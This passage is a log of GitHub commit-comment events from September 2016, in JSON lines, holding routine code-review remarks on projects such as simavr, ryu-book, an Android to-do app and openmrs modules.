returns -2 (when it should return 3). Then onto that I use ChangeContractTurns(ID, 5) and GetContractTurnsRemaining(ID) returns 2. So not quite sure what's going on there.\r\n\r\nThanks for the fixes so far!"}},"created_at":"2016-09-01T04:52:16Z"}
{"id":"4500469752","type":"CommitCommentEvent","actor":{"login":"da3dsoul"},"repo":{"name":"bigretromike/nakamori"},"payload":{"comment":{"id":18858086,"position":null,"line":null,"path":null,"commit_id":"79cd2a50ba291939edb6a2ce99d902239a83a823","created_at":"2016-09-01T04:55:19Z","updated_at":"2016-09-01T04:55:19Z","body":"Yeah. I'll write a short tut and put it in a zip in the repository"}},"created_at":"2016-09-01T04:55:19Z"}
{"id":"4500471724","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18858092,"position":null,"line":null,"path":null,"commit_id":"dbab0266e6d1268b2744f08345e19c6f555c45b3","created_at":"2016-09-01T04:56:11Z","updated_at":"2016-09-01T04:56:11Z","body":"Related to: backdrop/backdrop-issues#2023 "}},"created_at":"2016-09-01T04:56:11Z"}
{"id":"4500472422","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18858094,"position":null,"line":null,"path":null,"commit_id":"80d84f5d01e1521cf9c5594642b69202f0f6df3a","created_at":"2016-09-01T04:56:28Z","updated_at":"2016-09-01T04:56:28Z","body":"Related to: backdrop/backdrop-issues#2023 "}},"created_at":"2016-09-01T04:56:28Z"}
{"id":"4500479406","type":"CommitCommentEvent","actor":{"login":"messani"},"repo":{"name":"bsekisser/simavr"},"payload":{"comment":{"id":18858109,"position":21,"line":287,"path":"simavr/sim/avr_timer.c","commit_id":"a7f0de0f759be78ff4cf345e1e35c9694c454970","created_at":"2016-09-01T04:59:45Z","updated_at":"2016-09-01T04:59:45Z","body":"1) Compiler know that it is const, because I do not change it\r\n2) I would bet that new compilers would produce same code with or without const.\r\n3) I can read better if code is not full of \"const\"\r\n4) If you really want it there, no problem. This is not my code :)"}},"created_at":"2016-09-01T04:59:45Z"}
{"id":"4500479778","type":"CommitCommentEvent","actor":{"login":"bradallred"},"repo":{"name":"mdworkman/uninformed-search"},"payload":{"comment":{"id":18858110,"position":null,"line":null,"path":null,"commit_id":"b287ed022d1b7fa0a2a775ea12e2cd837c09a647","created_at":"2016-09-01T04:59:54Z","updated_at":"2016-09-01T04:59:54Z","body":"thats clever :) much more efficient and much less code than the \"intuitive\" approach. I like it."}},"created_at":"2016-09-01T04:59:54Z"}
{"id":"4500482589","type":"CommitCommentEvent","actor":{"login":"cnt1992"},"repo":{"name":"ggstudy-ddup/es6"},"payload":{"comment":{"id":18858114,"position":46,"line":38,"path":"task1_calendar/index.html","commit_id":"7697bb55563ab7b2d446925ae245f0c104b25cbe","created_at":"2016-09-01T05:01:03Z","updated_at":"2016-09-01T05:01:03Z","body":"css类名不建议用驼峰，要么下划线连接，要么中划线连接，保持统一，比如： days_list / days-list "}},"created_at":"2016-09-01T05:01:03Z"}
{"id":"4500482747","type":"CommitCommentEvent","actor":{"login":"nikhil-ch"},"repo":{"name":"rajn-webonise/DevOpsAssignment"},"payload":{"comment":{"id":18858115,"position":5,"line":5,"path":"dockerrails/docker-compose.yml","commit_id":"2fe13513720c0b3acbdd066c6e088aaadad73757","created_at":"2016-09-01T05:01:07Z","updated_at":"2016-09-01T05:01:07Z","body":"How does the Rails application connect with the DB instance?"}},"created_at":"2016-09-01T05:01:07Z"}
{"id":"4500485472","type":"CommitCommentEvent","actor":{"login":"kithrup"},"repo":{"name":"freenas/freenas"},"payload":{"comment":{"id":18858121,"position":null,"line":null,"path":null,"commit_id":"a3edaebbaee7eba1f073f17bc4fd7284432f8778","created_at":"2016-09-01T05:02:12Z","updated_at":"2016-09-01T05:02:12Z","body":"It should default to the current method according to Jordan."}},"created_at":"2016-09-01T05:02:12Z"}
{"id":"4500488215","type":"CommitCommentEvent","actor":{"login":"geoffjentry"},"repo":{"name":"broadinstitute/cromwell"},"payload":{"comment":{"id":18858128,"position":null,"line":null,"path":null,"commit_id":"f22dac4fc3794dce29aa0f7a67d84eb53fdc7fe9","created_at":"2016-09-01T05:03:20Z","updated_at":"2016-09-01T05:03:20Z","body":"This is temporary, right?"}},"created_at":"2016-09-01T05:03:20Z"}
{"id":"4500488717","type":"CommitCommentEvent","actor":{"login":"messani"},"repo":{"name":"bsekisser/simavr"},"payload":{"comment":{"id":18858129,"position":48,"line":307,"path":"simavr/sim/avr_timer.c","commit_id":"a7f0de0f759be78ff4cf345e1e35c9694c454970","created_at":"2016-09-01T05:03:33Z","updated_at":"2016-09-01T05:03:33Z","body":"No. Overflow will happen when timer gets from 0xff to 0x00 -> this is a reason why there is +1.\r\nOCR will happen when there is OCR value in TMR. There cannot be +1"}},"created_at":"2016-09-01T05:03:33Z"}
{"id":"4500490642","type":"CommitCommentEvent","actor":{"login":"int19h"},"repo":{"name":"Microsoft/RTVS"},"payload":{"comment":{"id":18858132,"position":35,"line":112,"path":"src/R/Components/Impl/InteractiveWorkflow/Implementation/RInteractiveWorkflow.cs","commit_id":"e52124fac6645fe888e6d45d3dac98f50d8c9420","created_at":"2016-09-01T05:04:25Z","updated_at":"2016-09-01T05:04:25Z","body":"Aren't we regressing #1938 here? Looks like that problem will now occur again if the user does not have a project?"}},"created_at":"2016-09-01T05:04:25Z"}
{"id":"4500493438","type":"CommitCommentEvent","actor":{"login":"messani"},"repo":{"name":"bsekisser/simavr"},"payload":{"comment":{"id":18858135,"position":90,"line":338,"path":"simavr/sim/avr_timer.c","commit_id":"a7f0de0f759be78ff4cf345e1e35c9694c454970","created_at":"2016-09-01T05:05:33Z","updated_at":"2016-09-01T05:05:33Z","body":"Yes, but this is not wrong because p->tov_base is uint64_t. It should be fixed there first.\r\nIn this case uint64_t is OK."}},"created_at":"2016-09-01T05:05:33Z"}
{"id":"4500493825","type":"CommitCommentEvent","actor":{"login":"adamschwartz"},"repo":{"name":"EagerIO/EmbedBox"},"payload":{"comment":{"id":18858137,"position":10,"line":59,"path":"app/components/target-search/target-search.styl","commit_id":"a5d47599072bce5e225c4480fca6892a25a68f08","created_at":"2016-09-01T05:05:45Z","updated_at":"2016-09-01T05:05:45Z","body":"We’ll have to do better than just applying this based on a max-width query.\r\n\r\n![image](https://cloud.githubusercontent.com/assets/154613/18155908/de3bcfb6-6fdf-11e6-94ef-26bd2b7317a3.png)\r\n\r\nA better naive approach would be to apply a `data-` attribute or class name to the `html` element like `data-is-ios-safari` and then apply this on that. There might be a better way to duck-type it though."}},"created_at":"2016-09-01T05:05:45Z"}
{"id":"4500496126","type":"CommitCommentEvent","actor":{"login":"yrashk"},"repo":{"name":"npgall/cqengine"},"payload":{"comment":{"id":18858140,"position":null,"line":null,"path":null,"commit_id":"f4fd2e6b2b829fc982c2307ea54f11ee3dc0ad43","created_at":"2016-09-01T05:06:44Z","updated_at":"2016-09-01T05:06:44Z","body":"Great stuff! I've done something similar in [es4j](https://github.com/eventsourcing/es4j) recently. Just in case, typetools uses some undocumented APIs. "}},"created_at":"2016-09-01T05:06:44Z"}
{"id":"4500496411","type":"CommitCommentEvent","actor":{"login":"messani"},"repo":{"name":"bsekisser/simavr"},"payload":{"comment":{"id":18858141,"position":102,"line":349,"path":"simavr/sim/avr_timer.c","commit_id":"a7f0de0f759be78ff4cf345e1e35c9694c454970","created_at":"2016-09-01T05:06:51Z","updated_at":"2016-09-01T05:06:51Z","body":"I agree - I wrote that I am not C programmer and did not read how do you solve booleans (I did not have time for this). It is uint8_t in my branch now."}},"created_at":"2016-09-01T05:06:51Z"}
{"id":"4500501032","type":"CommitCommentEvent","actor":{"login":"warmhug"},"repo":{"name":"ant-design/ant-design-mobile"},"payload":{"comment":{"id":18858147,"position":null,"line":null,"path":null,"commit_id":"bb875c2a924f61cc03b8d013fd1a8f5ee8e22972","created_at":"2016-09-01T05:08:52Z","updated_at":"2016-09-01T05:08:52Z","body":"@silentcloud 注意下"}},"created_at":"2016-09-01T05:08:52Z"}
{"id":"4500503305","type":"CommitCommentEvent","actor":{"login":"aviraxp"},"repo":{"name":"wasdennnoch/AndroidN-ify"},"payload":{"comment":{"id":18858151,"position":null,"line":null,"path":null,"commit_id":"f95e467479213f597344547a1908a3a4e23e9007","created_at":"2016-09-01T05:09:54Z","updated_at":"2016-09-01T05:09:54Z","body":"@Maxr1998 No need to disable it, it is test build so everyone should take the risk of try it."}},"created_at":"2016-09-01T05:09:54Z"}
{"id":"4500504864","type":"CommitCommentEvent","actor":{"login":"apmuthu"},"repo":{"name":"FrontAccountingERP/FA"},"payload":{"comment":{"id":18858154,"position":null,"line":null,"path":null,"commit_id":"771285712c6554832851ade47b4808c14aa7eea5","created_at":"2016-09-01T05:10:34Z","updated_at":"2016-09-01T05:10:34Z","body":"````function get_supp_payment_before()```` can be cleaned up by providing **aliases** for the tables and removing the ````TB_PREF````s from the field references."}},"created_at":"2016-09-01T05:10:34Z"}
{"id":"4500506162","type":"CommitCommentEvent","actor":{"login":"messani"},"repo":{"name":"bsekisser/simavr"},"payload":{"comment":{"id":18858155,"position":202,"line":471,"path":"simavr/sim/avr_timer.c","commit_id":"a7f0de0f759be78ff4cf345e1e35c9694c454970","created_at":"2016-09-01T05:11:10Z","updated_at":"2016-09-01T05:11:10Z","body":"if p->cs_div_clock2 is float, then yes. But I would avoid floats.\r\nI think that if you need really good timing, p->tov_base should be float too. But there will be problems when arv->cycles goes to high number.\r\n\r\nI would really stick to uints. The only one reason why to use floats is asynchronous timer (32KHz)."}},"created_at":"2016-09-01T05:11:10Z"}
{"id":"4500511885","type":"CommitCommentEvent","actor":{"login":"rawsonj"},"repo":{"name":"rawsonj/triviabot"},"payload":{"comment":{"id":18858172,"position":null,"line":null,"path":null,"commit_id":"8867b11139495778e1998ba14355d842261b5783","created_at":"2016-09-01T05:13:35Z","updated_at":"2016-09-01T05:13:35Z","body":"Addressed both of these, thanks for reviewing!"}},"created_at":"2016-09-01T05:13:35Z"}
{"id":"4500512160","type":"CommitCommentEvent","actor":{"login":"ivanceras"},"repo":{"name":"kevinmehall/rust-peg"},"payload":{"comment":{"id":18858173,"position":null,"line":null,"path":null,"commit_id":"31e34b75f8d67a8518d62e35a16edfd0f2b92935","created_at":"2016-09-01T05:13:42Z","updated_at":"2016-09-01T05:13:42Z","body":"I was trying fixing my [code](https://github.com/ivanceras/inquerest) for compiler issues on the latest nightly and hit a point where I wish you have an update on rust-peg. Then suddenly a few minutes later a new update crate that works on the current nightly. Never have felt so magical. \r\n\r\nI am grateful of your work."}},"created_at":"2016-09-01T05:13:42Z"}
{"id":"4500512299","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":18858174,"position":null,"line":null,"path":null,"commit_id":"43ec3e7730f92edadb40fd1d886b36cd2db369f2","created_at":"2016-09-01T05:13:45Z","updated_at":"2016-09-01T05:13:45Z","body":"[Your benchmark job](https://github.com/JuliaLang/julia/commit/43ec3e7730f92edadb40fd1d886b36cd2db369f2#commitcomment-18857500) has completed - no performance regressions were detected. A full report can be found [here](https://github.com/JuliaCI/BaseBenchmarkReports/blob/89b1582b7bfbfeb360f7c04212370e65f3a735e9/daily_2016_9_1/report.md). cc @jrevels"}},"created_at":"2016-09-01T05:13:45Z"}
{"id":"4500514594","type":"CommitCommentEvent","actor":{"login":"DrPhilGood"},"repo":{"name":"DrPhilGood/cornflakesaredelicious"},"payload":{"comment":{"id":18858178,"position":null,"line":null,"path":null,"commit_id":"86a85322f546233ec0b7f9e9d64c7cce509703e0","created_at":"2016-09-01T05:14:41Z","updated_at":"2016-09-01T05:14:41Z","body":"This commit is terrible, you're fired!"}},"created_at":"2016-09-01T05:14:41Z"}
{"id":"4500515094","type":"CommitCommentEvent","actor":{"login":"shinpeimuraoka"},"repo":{"name":"osrg/ryu-book"},"payload":{"comment":{"id":18858181,"position":6,"line":252,"path":"en/source/switching_hub.rst","commit_id":"4b407c55503a0397a2cf89d18de0c3c5d8b3f423","created_at":"2016-09-01T05:14:56Z","updated_at":"2016-09-01T05:14:56Z","body":"上記により修正方法が変更となりましたので、\r\nコミットログを以下のように修正します。\r\n\r\n```\r\nen: siwtching_hub: Fixed the module name of Ryu\r\n\r\nIf the latest version of OpenFlow has been released,\r\nneed to append the latest version of OpenFlow to Ryu-book.\r\nSo Ryu-book update was a cumbersome.\r\nThis patch fixed the module name of ryu to module name of OpenFlow 1.3.\r\n```"}},"created_at":"2016-09-01T05:14:56Z"}
{"id":"4500515825","type":"CommitCommentEvent","actor":{"login":"StandardJazz"},"repo":{"name":"StandardJazz/WinPro418"},"payload":{"comment":{"id":18858183,"position":null,"line":null,"path":null,"commit_id":"347c3aed3380ebd4cdf52dc58d875ac53565b040","created_at":"2016-09-01T05:15:14Z","updated_at":"2016-09-01T05:15:14Z","body":"Leave Message"}},"created_at":"2016-09-01T05:15:14Z"}
{"id":"4500518569","type":"CommitCommentEvent","actor":{"login":"k-joseph"},"repo":{"name":"IsantePlus/openmrs-module-patientflags"},"payload":{"comment":{"id":18858188,"position":6,"line":39,"path":"pom.xml","commit_id":"87d98c06e9e950399050e54b7393d17263370797","created_at":"2016-09-01T05:16:13Z","updated_at":"2016-09-01T05:16:13Z","body":"can you instead make this version 1.11.0 to support all 1.11.x platforms which are in the available released reference applications!!!"}},"created_at":"2016-09-01T05:16:13Z"}
{"id":"4500520727","type":"CommitCommentEvent","actor":{"login":"HUANGKAI666"},"repo":{"name":"HUANGKAI666/huangkai"},"payload":{"comment":{"id":18858192,"position":null,"line":null,"path":null,"commit_id":"84479626d15e52d4a29b9282f75c224a8558ea1c","created_at":"2016-09-01T05:17:04Z","updated_at":"2016-09-01T05:17:04Z","body":"1"}},"created_at":"2016-09-01T05:17:04Z"}
{"id":"4500521136","type":"CommitCommentEvent","actor":{"login":"jepcastelein"},"repo":{"name":"segmentio/marketo-rest-python"},"payload":{"comment":{"id":18858193,"position":null,"line":null,"path":null,"commit_id":"71cf93c0b015e6ac0eeca5582170eb6fb582f13c","created_at":"2016-09-01T05:17:15Z","updated_at":"2016-09-01T05:17:15Z","body":"I merged these changes into the main branch and made an additional change to make sure long-running processes refresh the access token successfully"}},"created_at":"2016-09-01T05:17:15Z"}
{"id":"4500522108","type":"CommitCommentEvent","actor":{"login":"sethsakamoto"},"repo":{"name":"tunein/engineering"},"payload":{"comment":{"id":18858195,"position":null,"line":null,"path":null,"commit_id":"1b29d206751558efe0f0f722b08cfac6a72182d9","created_at":"2016-09-01T05:17:40Z","updated_at":"2016-09-01T05:17:40Z","body":"Thanks Chioke! \n\nWe need scope and behaviors for the senior bands.   Are you adding those as well? "}},"created_at":"2016-09-01T05:17:40Z"}
{"id":"4500523745","type":"CommitCommentEvent","actor":{"login":"HUANGKAI666"},"repo":{"name":"HUANGKAI666/huangkai"},"payload":{"comment":{"id":18858199,"position":null,"line":null,"path":null,"commit_id":"84479626d15e52d4a29b9282f75c224a8558ea1c","created_at":"2016-09-01T05:18:21Z","updated_at":"2016-09-01T05:18:21Z","body":"QWEWE"}},"created_at":"2016-09-01T05:18:21Z"}
{"id":"4500523839","type":"CommitCommentEvent","actor":{"login":"HUANGKAI666"},"repo":{"name":"HUANGKAI666/huangkai"},"payload":{"comment":{"id":18858200,"position":null,"line":null,"path":null,"commit_id":"84479626d15e52d4a29b9282f75c224a8558ea1c","created_at":"2016-09-01T05:18:23Z","updated_at":"2016-09-01T05:18:23Z","body":"EWE"}},"created_at":"2016-09-01T05:18:23Z"}
{"id":"4500527705","type":"CommitCommentEvent","actor":{"login":"JCG-1978"},"repo":{"name":"JCG-1978/ALLinONE"},"payload":{"comment":{"id":18858205,"position":null,"line":null,"path":null,"commit_id":"94bdfe9a501854219c37a5b7e0ca7347be385a84","created_at":"2016-09-01T05:20:07Z","updated_at":"2016-09-01T05:20:07Z","body":"plugin.video.Martunis-1.1.1.zip"}},"created_at":"2016-09-01T05:20:07Z"}
{"id":"4500530637","type":"CommitCommentEvent","actor":{"login":"OINUMAKAZUKI"},"repo":{"name":"ts86clri/ToDoApp"},"payload":{"comment":{"id":18858209,"position":34,"line":191,"path":"app/src/main/java/net/appbank/testproject/todoapp/MainActivity.java","commit_id":"45b74b2c455693df12d6a608d65ef98c22ca2dc6","created_at":"2016-09-01T05:21:21Z","updated_at":"2016-09-01T05:21:21Z","body":"if のあとにスペースを入れる"}},"created_at":"2016-09-01T05:21:21Z"}
{"id":"4500532114","type":"CommitCommentEvent","actor":{"login":"k-joseph"},"repo":{"name":"IsantePlus/openmrs-module-patientflags"},"payload":{"comment":{"id":18858212,"position":6,"line":39,"path":"pom.xml","commit_id":"87d98c06e9e950399050e54b7393d17263370797","created_at":"2016-09-01T05:21:57Z","updated_at":"2016-09-01T05:21:57Z","body":"And then change require_version in config.xml to ${openMRSVersion}"}},"created_at":"2016-09-01T05:21:57Z"}
{"id":"4500532226","type":"CommitCommentEvent","actor":{"login":"OINUMAKAZUKI"},"repo":{"name":"ts86clri/ToDoApp"},"payload":{"comment":{"id":18858214,"position":22,"line":158,"path":"app/src/main/java/net/appbank/testproject/todoapp/MainActivity.java","commit_id":"45b74b2c455693df12d6a608d65ef98c22ca2dc6","created_at":"2016-09-01T05:22:01Z","updated_at":"2016-09-01T05:22:01Z","body":"Log.d をコメントアウトしておく"}},"created_at":"2016-09-01T05:22:01Z"}
{"id":"4500532754","type":"CommitCommentEvent","actor":{"login":"mahlin"},"repo":{"name":"mahlin/hello-world"},"payload":{"comment":{"id":18858215,"position":null,"line":null,"path":null,"commit_id":"f473b3afdfebb7e5c725a2c0cf716ffba3073cf1","created_at":"2016-09-01T05:22:14Z","updated_at":"2016-09-01T05:22:14Z","body":"Testar"}},"created_at":"2016-09-01T05:22:14Z"}
{"id":"4500533933","type":"CommitCommentEvent","actor":{"login":"OINUMAKAZUKI"},"repo":{"name":"ts86clri/ToDoApp"},"payload":{"comment":{"id":18858220,"position":11,"line":111,"path":"app/src/main/java/net/appbank/testproject/todoapp/MainActivity.java","commit_id":"45b74b2c455693df12d6a608d65ef98c22ca2dc6","created_at":"2016-09-01T05:22:43Z","updated_at":"2016-09-01T05:22:43Z","body":"mIntent のあとにスペースを入れる"}},"created_at":"2016-09-01T05:22:43Z"}
{"id":"4500534764","type":"CommitCommentEvent","actor":{"login":"OINUMAKAZUKI"},"repo":{"name":"ts86clri/ToDoApp"},"payload":{"comment":{"id":18858221,"position":3,"line":103,"path":"app/src/main/java/net/appbank/testproject/todoapp/MainActivity.java","commit_id":"45b74b2c455693df12d6a608d65ef98c22ca2dc6","created_at":"2016-09-01T05:23:05Z","updated_at":"2016-09-01T05:23:05Z","body":"TODO: Log.d をコメントアウトしておく"}},"created_at":"2016-09-01T05:23:05Z"}
{"id":"4500535409","type":"CommitCommentEvent","actor":{"login":"shadowwalkersb"},"repo":{"name":"conda-forge/conda-smithy"},"payload":{"comment":{"id":18858222,"position":19,"line":150,"path":"conda_smithy/configure_feedstock.py","commit_id":"eb09f6cc176eae683e58121f9f16e58b0664f6e7","created_at":"2016-09-01T05:23:21Z","updated_at":"2016-09-01T05:23:21Z","body":"Isn't `channels['targets']` meant to be the organization name passed to the script, instead of the hard-wired  `'conda-forge'`?"}},"created_at":"2016-09-01T05:23:21Z"}
{"id":"4500537460","type":"CommitCommentEvent","actor":{"login":"ivandrofly"},"repo":{"name":"SubtitleEdit/subtitleedit"},"payload":{"comment":{"id":18858230,"position":null,"line":null,"path":null,"commit_id":"f6e917367921d0f459c7b021996d77979e83a8b6","created_at":"2016-09-01T05:24:12Z","updated_at":"2016-09-01T05:24:12Z","body":"> yes\r\n\r\nUpdated, can you please test it again?\r\nOne more bug fixed regarding to Compare when lines are deleted from non successive position."}},"created_at":"2016-09-01T05:24:12Z"}
{"id":"4500538331","type":"CommitCommentEvent","actor":{"login":"OINUMAKAZUKI"},"repo":{"name":"ts86clri/ToDoApp"},"payload":{"comment":{"id":18858233,"position":null,"line":null,"path":null,"commit_id":"45b74b2c455693df12d6a608d65ef98c22ca2dc6","created_at":"2016-09-01T05:24:32Z","updated_at":"2016-09-01T05:24:32Z","body":"コメントがかなり良い感じb"}},"created_at":"2016-09-01T05:24:32Z"}
{"id":"4500542338","type":"CommitCommentEvent","actor":{"login":"shinpeimuraoka"},"repo":{"name":"osrg/ryu-book"},"payload":{"comment":{"id":18858241,"position":null,"line":null,"path":null,"commit_id":"dcb37bbf0c25fc5cab7636c68adf0d14daf2054f","created_at":"2016-09-01T05:26:11Z","updated_at":"2016-09-01T05:26:11Z","body":"switching_hubにてご指摘を受けたように、ここもOpenFlowのバージョンが増える度に\r\n更新する必要がありますので、OpenFlow1.3のみの記載に修正します。\r\n\r\n```\r\n各OpenFlowバージョン(バージョンX.Y)について、\r\n定数モジュール(ofproto_vX_Y)と\r\nパーサーモジュール(ofproto_vX_Y_parser)が用意されています。\r\n各OpenFlowバージョンの実装は基本的に独立しています。\r\nOpenFlow 1.3 の場合は下記になります。\r\n\r\n================== ======================== ===============================\r\nOpenFlowバージョン 定数モジュール           パーサーモジュール\r\n================== ======================== ===============================\r\n1.3.x              ryu.ofproto.ofproto_v1_3 ryu.ofproto.ofproto_v1_3_parser\r\n================== ======================== ===============================\r\n```\r\n\r\n"}},"created_at":"2016-09-01T05:26:11Z"}
{"id":"4500543355","type":"CommitCommentEvent","actor":{"login":"OINUMAKAZUKI"},"repo":{"name":"ts86clri/ToDoApp"},"payload":{"comment":{"id":18858242,"position":14,"line":38,"path":"app/src/main/java/net/appbank/testproject/todoapp/EditActivity.java","commit_id":"67e3f798a6dcca70139396da7ae20ad0d111a667","created_at":"2016-09-01T05:26:35Z","updated_at":"2016-09-01T05:26:35Z","body":"data は他の名前のほうがわかりやすいかもね\r\nあと、m◯◯ という形で変数名を書いてほしい！"}},"created_at":"2016-09-01T05:26:35Z"}
{"id":"4500544700","type":"CommitCommentEvent","actor":{"login":"bigretromike"},"repo":{"name":"bigretromike/nakamori"},"payload":{"comment":{"id":18858243,"position":null,"line":null,"path":null,"commit_id":"79cd2a50ba291939edb6a2ce99d902239a83a823","created_at":"2016-09-01T05:27:08Z","updated_at":"2016-09-01T05:27:08Z","body":"did you add extra setting into setting.xml or should I add it ? I dont want to duplicate work that is already done"}},"created_at":"2016-09-01T05:27:08Z"}
{"id":"4500548270","type":"CommitCommentEvent","actor":{"login":"ddennedy"},"repo":{"name":"dyne/frei0r"},"payload":{"comment":{"id":18858248,"position":null,"line":null,"path":null,"commit_id":"b63f5db473ce280f8532e2eb6f4f6a5df9b7af91","created_at":"2016-09-01T05:28:34Z","updated_at":"2016-09-01T05:28:34Z","body":"You should increase the plugin version when you make this change. Since adding new params, I suggest to bump major version and reset minor. Thanks"}},"created_at":"2016-09-01T05:28:34Z"}
{"id":"4500548825","type":"CommitCommentEvent","actor":{"login":"da3dsoul"},"repo":{"name":"bigretromike/nakamori"},"payload":{"comment":{"id":18858250,"position":null,"line":null,"path":null,"commit_id":"79cd2a50ba291939edb6a2ce99d902239a83a823","created_at":"2016-09-01T05:28:47Z","updated_at":"2016-09-01T05:28:47Z","body":"Yes, already added"}},"created_at":"2016-09-01T05:28:47Z"}
{"id":"4500551250","type":"CommitCommentEvent","actor":{"login":"magdeleineloaiza"},"repo":{"name":"magdeleineloaiza/hoja-de-vida"},"payload":{"comment":{"id":18858254,"position":null,"line":null,"path":null,"commit_id":"2936c22f52d7e2f6a0534efdb27ad936bd0c0c7c","created_at":"2016-09-01T05:29:46Z","updated_at":"2016-09-01T05:29:46Z","body":"[Hoja de vida Ing Magdeleine Loaiza.pdf](https://github.com/magdeleineloaiza/hoja-de-vida/files/448874/Hoja.de.vida.Ing.Magdeleine.Loaiza.pdf)\r\n"}},"created_at":"2016-09-01T05:29:46Z"}
{"id":"4500554440","type":"CommitCommentEvent","actor":{"login":"OINUMAKAZUKI"},"repo":{"name":"ts86clri/ToDoApp"},"payload":{"comment":{"id":18858260,"position":null,"line":null,"path":null,"commit_id":"a609456f3836979af910e7113aba8afb756b930b","created_at":"2016-09-01T05:30:55Z","updated_at":"2016-09-01T05:30:55Z","body":"edit_layout.xml に記述されているid は小文字のほうが良い\r\nAndroid のコーディングルール上、 id = 小文字なので！\r\n\r\n```xml\r\n// 例\r\n<CheckBox\r\n  android:id=\"@+id/blue_check_box\"  />\r\n```\r\n\r\nid 名には `何を示すか` + `View` にしたほうがわかりやすいかも"}},"created_at":"2016-09-01T05:30:55Z"}
{"id":"4500554573","type":"CommitCommentEvent","actor":{"login":"Vishal0203"},"repo":{"name":"beautiful-code/mentorhub"},"payload":{"comment":{"id":18858263,"position":13,"line":21,"path":"app/controllers/organizations_controller.rb","commit_id":"22591b6bd20b2f2189fa3d547cd2718928540ab8","created_at":"2016-09-01T05:30:58Z","updated_at":"2016-09-01T05:30:58Z","body":"is this a `synchronous`  or `asynchronous` method?"}},"created_at":"2016-09-01T05:30:58Z"}
{"id":"4500554946","type":"CommitCommentEvent","actor":{"login":"chayano"},"repo":{"name":"rafatosta/ThemeBr"},"payload":{"comment":{"id":18858264,"position":3,"line":3,"path":"Tema BR/theme/src/main/res/values/styles.xml","commit_id":"6de0555b772694cfa9949206311a822f6dc52733","created_at":"2016-09-01T05:31:08Z","updated_at":"2016-09-01T05:31:08Z","body":"ok"}},"created_at":"2016-09-01T05:31:08Z"}
{"id":"4500555965","type":"CommitCommentEvent","actor":{"login":"chayano"},"repo":{"name":"rafatosta/ThemeBr"},"payload":{"comment":{"id":18858270,"position":3,"line":3,"path":"Tema BR/theme/src/main/res/values/styles.xml","commit_id":"6de0555b772694cfa9949206311a822f6dc52733","created_at":"2016-09-01T05:31:31Z","updated_at":"2016-09-01T05:31:31Z","body":"ok\r\n"}},"created_at":"2016-09-01T05:31:31Z"}
{"id":"4500557012","type":"CommitCommentEvent","actor":{"login":"aloisiusStephen"},"repo":{"name":"aloisiusStephen/addressbook-level2"},"payload":{"comment":{"id":18858275,"position":null,"line":null,"path":null,"commit_id":"d11cb38ca9b787053e5d17748e4fdd27e19aeb82","created_at":"2016-09-01T05:31:56Z","updated_at":"2016-09-01T05:31:56Z","body":"Correction: \"userguide\" here refers to the comments in the code which is inaccurate"}},"created_at":"2016-09-01T05:31:56Z"}
{"id":"4500557135","type":"CommitCommentEvent","actor":{"login":"ggnull35"},"repo":{"name":"FFmpeg/FFmpeg"},"payload":{"comment":{"id":18858277,"position":null,"line":null,"path":null,"commit_id":"d1bf8a3aa878003f5019bb97c3228f8027e5d116","created_at":"2016-09-01T05:31:59Z","updated_at":"2016-09-01T05:31:59Z","body":"Fixed by https://github.com/FFmpeg/FFmpeg/commit/99882d05a6635446d587ed51b095c627abc42587"}},"created_at":"2016-09-01T05:31:59Z"}
{"id":"4500557361","type":"CommitCommentEvent","actor":{"login":"chayano"},"repo":{"name":"rafatosta/ThemeBr"},"payload":{"comment":{"id":18858280,"position":null,"line":null,"path":null,"commit_id":"6de0555b772694cfa9949206311a822f6dc52733","created_at":"2016-09-01T05:32:06Z","updated_at":"2016-09-01T05:32:06Z","body":"ok"}},"created_at":"2016-09-01T05:32:06Z"}
{"id":"4500557429","type":"CommitCommentEvent","actor":{"login":"SebastianZ"},"repo":{"name":"w3c/svgwg"},"payload":{"comment":{"id":18858281,"position":null,"line":null,"path":null,"commit_id":"647dda4ab47be431cd4ef0522042d7246c232159","created_at":"2016-09-01T05:32:08Z","updated_at":"2016-09-01T05:32:08Z","body":"In the last telcon [the CSSWG agreed on the `[ <foo>+ ]#` syntax](https://lists.w3.org/Archives/Public/www-style/2016Sep/0000.html) and to add a note clarifying the semantical difference to the normal meaning.\r\n\r\n@nikosandronikos Could you please adjust the grammar accordingly?\r\n\r\nSebastian"}},"created_at":"2016-09-01T05:32:08Z"}
{"id":"4500560261","type":"CommitCommentEvent","actor":{"login":"bigretromike"},"repo":{"name":"bigretromike/nakamori"},"payload":{"comment":{"id":18858285,"position":null,"line":null,"path":null,"commit_id":"79cd2a50ba291939edb6a2ce99d902239a83a823","created_at":"2016-09-01T05:33:17Z","updated_at":"2016-09-01T05:33:17Z","body":"yeah, that what I thought but didn't saw code ;-)"}},"created_at":"2016-09-01T05:33:17Z"}
{"id":"4500561432","type":"CommitCommentEvent","actor":{"login":"k-joseph"},"repo":{"name":"IsantePlus/openmrs-module-patientflags"},"payload":{"comment":{"id":18858290,"position":17,"line":43,"path":"omod/src/main/java/org/openmrs/module/patientflags/fragment/controller/AlerteFragmentController.java","commit_id":"87d98c06e9e950399050e54b7393d17263370797","created_at":"2016-09-01T05:33:45Z","updated_at":"2016-09-01T05:33:45Z","body":"I don't see any patient flags section onto my patient dashboard clinician facing page!!!"}},"created_at":"2016-09-01T05:33:45Z"}
{"id":"4500564024","type":"CommitCommentEvent","actor":{"login":"Vishal0203"},"repo":{"name":"beautiful-code/mentorhub"},"payload":{"comment":{"id":18858295,"position":15,"line":54,"path":"app/assets/javascripts/angular/app.js","commit_id":"707d575d3d7a3f6a72d73de1014f4e1e705a83cc","created_at":"2016-09-01T05:34:49Z","updated_at":"2016-09-01T05:34:49Z","body":"no need of concatenation here"}},"created_at":"2016-09-01T05:34:49Z"}
